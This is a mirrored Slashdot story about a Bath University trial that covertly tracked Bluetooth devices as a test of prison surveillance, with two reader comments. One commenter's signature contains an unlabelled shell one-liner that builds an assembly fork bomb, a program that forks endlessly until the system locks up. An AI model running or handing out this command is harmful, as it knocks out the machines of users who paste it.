Slashdot Mirror


Bluetooth Surveillance Tested In the UK

KentuckyFC writes "If you live in the city of Bath in the UK and carry a Bluetooth-enabled device, your movements may have been secretly monitored in an experiment designed to test surveillance techniques in prisons. Researchers from Bath University recorded the movements of 10,000 Bluetooth-enabled devices during their 6-month trial. They say the experiment was a test of a technique for monitoring the interactions between prisoners in jail that could be used to work out which inmates have become closely associated. The work was prompted by revelations that the Madrid train bombers who devastated the city in 2004 first met in a Spanish prison (abstract)."

2 of 85 comments (clear)

  1. That explanation smells like bullshit by Reality+Master+201 · · Score: 5, Insightful

    Tracking prisoners? With Bluetooth devices? Horseshit.

    RFID is a far better choice - it's passive (no batteries) and it's cheap. I bet the purpose of Bluetooth tracking is to track non-imprisoned people.

  2. Re:I've been experimenting with this a while. by Hal_Porter · · Score: 5, Informative

    Don't click notlong.com link in parent. Nasty stuff.

    --
    echo -e 'global _start\n _start:\n mov eax, 2\n int 80h\n jmp _start' > a.asm; nasm a.asm -f elf; ld a.o -o a;